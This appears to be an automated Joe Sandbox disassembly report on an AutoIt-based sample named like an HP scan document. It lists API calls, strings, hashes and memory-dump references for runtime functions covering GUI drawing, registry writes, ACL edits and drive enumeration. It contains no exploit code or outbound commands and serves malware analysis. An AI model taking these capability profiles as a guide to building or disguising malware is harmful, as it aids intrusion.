Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 6a9f505a4b66626d54d2ff73e0a16dbd40530a03a39c8a3c252f0940388148a9
Instruction ID: b82ab0379efe228cf936f22c1adff8984c37dd5cce674eb522ec3d48bd23b061
Opcode Fuzzy Hash: 6a9f505a4b66626d54d2ff73e0a16dbd40530a03a39c8a3c252f0940388148a9
Instruction Fuzzy Hash: F1B13B71A00219BFEB14DFA8DC89EAE7BA9FB09714F044115F915EB690D774AD40CBA0

Function 00884ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00884AED
GetDriveTypeW.KERNEL32(?,008ACB68,?,\\.\,008ACC08), ref: 00884BCA
SetErrorMode.KERNEL32(00000000,008ACB68,?,\\.\,008ACC08), ref: 00884D36

Strings

Fixed, xrefs: 00884C09
FileBackedVirtual, xrefs: 00884CEC
SCSI, xrefs: 00884C8A
Network, xrefs: 00884C02
ATA, xrefs: 00884C98
SSA, xrefs: 00884CA6
Unknown, xrefs: 00884BED, 00884C83
iSCSI, xrefs: 00884CC2
PhysicalDrive, xrefs: 00884B76
1394, xrefs: 00884C9F
Fibre, xrefs: 00884CAD
SAS, xrefs: 00884CC9
Removable, xrefs: 00884C10, 00884C15
\\.\, xrefs: 00884B3F
ATAPI, xrefs: 00884C91
MMC, xrefs: 00884CDE
USB, xrefs: 00884CB4
CDROM, xrefs: 00884BFB
SSD, xrefs: 00884C4A
Virtual, xrefs: 00884CE5
RAMDisk, xrefs: 00884BF4
SATA, xrefs: 00884CD0
RAID, xrefs: 00884CBB

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 13044c364e687491ff0567171906d62c29cfe5205508f9b38f939749b4c56ecf
Instruction ID: 3b938c1218e075d32656273d48aea033e0317bb83a3a611492774d76d5b181e8
Opcode Fuzzy Hash: 13044c364e687491ff0567171906d62c29cfe5205508f9b38f939749b4c56ecf
Instruction Fuzzy Hash: 7761B23260120F9BCB04EF58D9819A8B7BAFF04304B249116F816EB751EB7AED51DB42

Function 008A73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 008A7421
SetTextColor.GDI32(?,?), ref: 008A7425
GetSysColorBrush.USER32(0000000F), ref: 008A743B
GetSysColor.USER32(0000000F), ref: 008A7446
CreateSolidBrush.GDI32(?), ref: 008A744B
GetSysColor.USER32(00000011), ref: 008A7463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 008A7471
SelectObject.GDI32(?,00000000), ref: 008A7482
SetBkColor.GDI32(?,00000000), ref: 008A748B
SelectObject.GDI32(?,?), ref: 008A7498
InflateRect.USER32(?,000000FF,000000FF), ref: 008A74B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008A74CE
GetWindowLongW.USER32(00000000,000000F0), ref: 008A74DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 008A752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 008A7554
InflateRect.USER32(?,000000FD,000000FD), ref: 008A7572
DrawFocusRect.USER32(?,?), ref: 008A757D
GetSysColor.USER32(00000011), ref: 008A758E
SetTextColor.GDI32(?,00000000), ref: 008A7596
DrawTextW.USER32(?,008A70F5,000000FF,?,00000000), ref: 008A75A8
SelectObject.GDI32(?,?), ref: 008A75BF
DeleteObject.GDI32(?), ref: 008A75CA
SelectObject.GDI32(?,?), ref: 008A75D0
DeleteObject.GDI32(?), ref: 008A75D5
SetTextColor.GDI32(?,?), ref: 008A75DB
SetBkColor.GDI32(?,?), ref: 008A75E5

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: b71fa0dce19053f4115ace822408aafb548b5517c0def5a26dbfbaad2a125535
Instruction ID: d812d1d982f2d7ba4756ad21e3d3513c687a419f784319ecacbfbd3f006acec0
Opcode Fuzzy Hash: b71fa0dce19053f4115ace822408aafb548b5517c0def5a26dbfbaad2a125535
Instruction Fuzzy Hash: 7D615C72D04218AFEF019FA4DC49EAEBFB9FF0A320F114125F915AB6A1D7749940DB90

Function 008A0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 008A1128
GetDesktopWindow.USER32 ref: 008A113D
GetWindowRect.USER32(00000000), ref: 008A1144
GetWindowLongW.USER32(?,000000F0), ref: 008A1199
DestroyWindow.USER32(?), ref: 008A11B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 008A11ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008A120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 008A121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 008A1232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 008A1245
IsWindowVisible.USER32(00000000), ref: 008A12A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 008A12BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 008A12D0
GetWindowRect.USER32(00000000,?), ref: 008A12E8
MonitorFromPoint.USER32(?,?,00000002), ref: 008A130E
GetMonitorInfoW.USER32(00000000,?), ref: 008A1328
CopyRect.USER32(?,?), ref: 008A133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 008A13AA

Strings

(, xrefs: 008A131B
0, xrefs: 008A10D3
tooltips_class32, xrefs: 008A11E6

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 6078defceadd444b0d5eac0661c077c7b7f743519df4ea511750deaef69ae3f7
Instruction ID: f32fd2b9dbf027f38fc0329020a0550b3bec858c9ad43adfe1e9bf9026f1051b
Opcode Fuzzy Hash: 6078defceadd444b0d5eac0661c077c7b7f743519df4ea511750deaef69ae3f7
Instruction Fuzzy Hash: EBB18F71608341AFEB04DF64C888BAABBE5FF85354F00891CF999DB661D771D844CB92

Function 008A0241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 008A02E5
_wcslen.LIBCMT ref: 008A031F
_wcslen.LIBCMT ref: 008A0389
_wcslen.LIBCMT ref: 008A03F1
_wcslen.LIBCMT ref: 008A0475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 008A04C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008A0504

Part of subcall function 0082F9F2: _wcslen.LIBCMT ref: 0082F9FD

Part of subcall function 0087223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00872258
Part of subcall function 0087223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0087228A

Strings

SELECTINVERT, xrefs: 008A057E
GETITEMCOUNT, xrefs: 008A0316, 008A0337
SELECT, xrefs: 008A0548
GETSUBITEMCOUNT, xrefs: 008A0384, 008A039F
ISSELECTED, xrefs: 008A04DD
GETSELECTEDCOUNT, xrefs: 008A0470, 008A048B
GETTEXT, xrefs: 008A03EC, 008A0407
FINDITEM, xrefs: 008A0627
VIEWCHANGE, xrefs: 008A0675
DESELECT, xrefs: 008A059C
GETSELECTED, xrefs: 008A05E1
SELECTALL, xrefs: 008A0515
SELECTCLEAR, xrefs: 008A052D

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 09b276eeecea602e576756d59865e695911b348fca23d2618e27e5b1246b0c47
Instruction ID: f33c497cf582ca8cd97deacdc8d61a415176e0587becb6d26c055dbf7b783994
Opcode Fuzzy Hash: 09b276eeecea602e576756d59865e695911b348fca23d2618e27e5b1246b0c47
Instruction Fuzzy Hash: DEE19F312083018FD714DF28C45096AB7E6FF99318B544A6DF896DB7A6DB30ED85CB82

Function 00828891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00828968
GetSystemMetrics.USER32(00000007), ref: 00828970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0082899B
GetSystemMetrics.USER32(00000008), ref: 008289A3
GetSystemMetrics.USER32(00000004), ref: 008289C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 008289E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 008289F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00828A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00828A3C
GetClientRect.USER32(00000000,000000FF), ref: 00828A5A
GetStockObject.GDI32(00000011), ref: 00828A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00828A81

Part of subcall function 0082912D: GetCursorPos.USER32(?), ref: 00829141
Part of subcall function 0082912D: ScreenToClient.USER32(00000000,?), ref: 0082915E
Part of subcall function 0082912D: GetAsyncKeyState.USER32(00000001), ref: 00829183
Part of subcall function 0082912D: GetAsyncKeyState.USER32(00000002), ref: 0082919D

SetTimer.USER32(00000000,00000000,00000028,008290FC), ref: 00828AA8

Strings

AutoIt v3 GUI, xrefs: 00828A20

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 65b2f7bdff100b5bc4fc3a0e4062aaaaf0a2b20773765d00c56758588aaec976
Instruction ID: 1e7d297346fd8879c6207814d3185916310917603fdfc47effda89773e7b3b84
Opcode Fuzzy Hash: 65b2f7bdff100b5bc4fc3a0e4062aaaaf0a2b20773765d00c56758588aaec976
Instruction Fuzzy Hash: 6DB18B31A00259DFDF14DFA8DC89BAE7BB5FB49314F114229FA15EB290DB34A880CB51

Function 00870D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 008710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00871114
Part of subcall function 008710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00870B9B,?,?,?), ref: 00871120
Part of subcall function 008710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00870B9B,?,?,?), ref: 0087112F
Part of subcall function 008710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00870B9B,?,?,?), ref: 00871136
Part of subcall function 008710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0087114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00870DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00870E29
GetLengthSid.ADVAPI32(?), ref: 00870E40
GetAce.ADVAPI32(?,00000000,?), ref: 00870E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00870E96
GetLengthSid.ADVAPI32(?), ref: 00870EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00870EB5
HeapAlloc.KERNEL32(00000000), ref: 00870EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00870EDD
CopySid.ADVAPI32(00000000), ref: 00870EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00870F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00870F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00870F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00870F6E
HeapFree.KERNEL32(00000000), ref: 00870F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00870F7E
HeapFree.KERNEL32(00000000), ref: 00870F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00870F8E
HeapFree.KERNEL32(00000000), ref: 00870F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00870FA1
HeapFree.KERNEL32(00000000), ref: 00870FA8

Part of subcall function 00871193: GetProcessHeap.KERNEL32(00000008,00870BB1,?,00000000,?,00870BB1,?), ref: 008711A1
Part of subcall function 00871193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00870BB1,?), ref: 008711A8
Part of subcall function 00871193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00870BB1,?), ref: 008711B7

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 8a70958244e7b9b1ea89b5fb30c31362f84d88e68bfe1bde3e9cc2b40f376da3
Instruction ID: b14e1bf5757deb1027f0da04fe830cea0fb39076fccd182a9704b252bed59697
Opcode Fuzzy Hash: 8a70958244e7b9b1ea89b5fb30c31362f84d88e68bfe1bde3e9cc2b40f376da3
Instruction Fuzzy Hash: BB712A7290020AEBEF20DFA4DC49BAEBBB8FF05310F148115E959E6195DB71D905CF60

Function 0089C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0089C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,008ACC08,00000000,?,00000000,?,?), ref: 0089C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0089C5A4
_wcslen.LIBCMT ref: 0089C5F4
_wcslen.LIBCMT ref: 0089C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0089C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0089C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0089C84D
RegCloseKey.ADVAPI32(?), ref: 0089C881
RegCloseKey.ADVAPI32(00000000), ref: 0089C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0089C960

Strings

REG_QWORD, xrefs: 0089C8C3
REG_MULTI_SZ, xrefs: 0089C6F5
REG_BINARY, xrefs: 0089C913
REG_SZ, xrefs: 0089C644
REG_EXPAND_SZ, xrefs: 0089C5CD
REG_DWORD, xrefs: 0089C804

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: f09024e0c9d2ac19e28c74665c87ecc6c5ebfbf4d44cc53dc4dbf4075efe6c1c
Instruction ID: 3592cf677bd1fdb2f3707b7949aa76978518516d903c92e6b052dafad841fb20
Opcode Fuzzy Hash: f09024e0c9d2ac19e28c74665c87ecc6c5ebfbf4d44cc53dc4dbf4075efe6c1c
Instruction Fuzzy Hash: 39124C356042019FDB14EF18C891A6AB7E5FF88714F09885DF85ADB3A2DB31ED41CB82

Function 008A091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 008A09C6
_wcslen.LIBCMT ref: 008A0A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 008A0A54
_wcslen.LIBCMT ref: 008A0A8A
_wcslen.LIBCMT ref: 008A0B06
_wcslen.LIBCMT ref: 008A0B81

Part of subcall function 0082F9F2: _wcslen.LIBCMT ref: 0082F9FD

Part of subcall function 00872BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00872BFA

Strings

EXPAND, xrefs: 008A0BF8
UNCHECK, xrefs: 008A0D3E
GETTEXT, xrefs: 008A0C97
GETTOTALCOUNT, xrefs: 008A09F2, 008A0A17
SELECT, xrefs: 008A0D11
GETITEMCOUNT, xrefs: 008A0C1E
GETSELECTED, xrefs: 008A0C4E
EXISTS, xrefs: 008A0B7C, 008A0B97
COLLAPSE, xrefs: 008A0B01, 008A0B1C
CHECK, xrefs: 008A0A85, 008A0AA0
ISCHECKED, xrefs: 008A0CE1

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 716e9a4005f01f64d5895b919b6b49adda69139083b3da1deea875496948c684
Instruction ID: d2534ad2d83b0b296e046ab743acea7ecfaecec67bae64dd29afc931086d326d
Opcode Fuzzy Hash: 716e9a4005f01f64d5895b919b6b49adda69139083b3da1deea875496948c684
Instruction Fuzzy Hash: C2E16A312083118FD714DF28C45096AB7E2FF99314B148A5DF896DB7A2D731ED86CB92

Function 0089C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0089B6AE,?,?), ref: 0089C9B5
_wcslen.LIBCMT ref: 0089C9F1
_wcslen.LIBCMT ref: 0089CA68
_wcslen.LIBCMT ref: 0089CA9E
_wcslen.LIBCMT ref: 0089CAF9
_wcslen.LIBCMT ref: 0089CB2F
_wcslen.LIBCMT ref: 0089CB7F

Strings

HKEY_CLASSES_ROOT, xrefs: 0089CAF3, 0089CAF8
HKEY_CURRENT_USER, xrefs: 0089CBBD
HKEY_USERS, xrefs: 0089CBDF
HKCC, xrefs: 0089CBAC
HKEY_CURRENT_CONFIG, xrefs: 0089CB79, 0089CB7E
HKU, xrefs: 0089CBF0
HKLM, xrefs: 0089CA98, 0089CA9D
HKCU, xrefs: 0089CBCE
HKCR, xrefs: 0089CB29, 0089CB2E
HKEY_LOCAL_MACHINE, xrefs: 0089CA62, 0089CA67

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: a3bd66c0332dd3843bc65499351af19d5925b0f863c407315e2162c468fa2866
Instruction ID: e2dcc496cbc453e223f1c7aac6548b2724d889f6aeb33e00598e37133f5a0db2
Opcode Fuzzy Hash: a3bd66c0332dd3843bc65499351af19d5925b0f863c407315e2162c468fa2866
Instruction Fuzzy Hash: D371F27260016A8BCF20EE6CCD515BE3795FFA0764F590629F856D7284F636CD84C3A1

Function 008A833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 008A835A
_wcslen.LIBCMT ref: 008A836E
_wcslen.LIBCMT ref: 008A8391
_wcslen.LIBCMT ref: 008A83B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 008A83F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,008A5BF2), ref: 008A844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 008A8487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 008A84CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 008A8501
FreeLibrary.KERNEL32(?), ref: 008A850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 008A851D
DestroyIcon.USER32(?,?,?,?,?,008A5BF2), ref: 008A852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 008A8549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 008A8555

Strings

.exe, xrefs: 008A8388
.dll, xrefs: 008A83AB
.icl, xrefs: 008A8368

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 8d802d9fe56fe3c04bd826e91ae5089fb377b311fc1d91e6e1ec46e38be62a71
Instruction ID: 4b2ebc5ca45f76d45d4bc894b703365abf446d762a3b20b491cd2aba7895bf4b
Opcode Fuzzy Hash: 8d802d9fe56fe3c04bd826e91ae5089fb377b311fc1d91e6e1ec46e38be62a71
Instruction Fuzzy Hash: 7461BD71900219FEFB14DF68CC45BBE77A8FB09B21F104609F815D65D1EBB4A990CBA0

Function 00817778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#comments-end, xrefs: 008178D9
#pragma compile, xrefs: 008177D3
#comments-start, xrefs: 0081785F, 008178B1
Cannot parse #include, xrefs: 00855279
#include-once, xrefs: 0081782F
', xrefs: 00855169
#include, xrefs: 00817847
#ce, xrefs: 008178ED
Unterminated group of comments, xrefs: 0085528C
", xrefs: 00855153
#notrayicon, xrefs: 008177E7
#cs, xrefs: 00817873, 008178C5
Bad directive syntax error, xrefs: 0085519A
#requireadmin, xrefs: 008177FF
#OnAutoItStartRegister, xrefs: 00817817

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
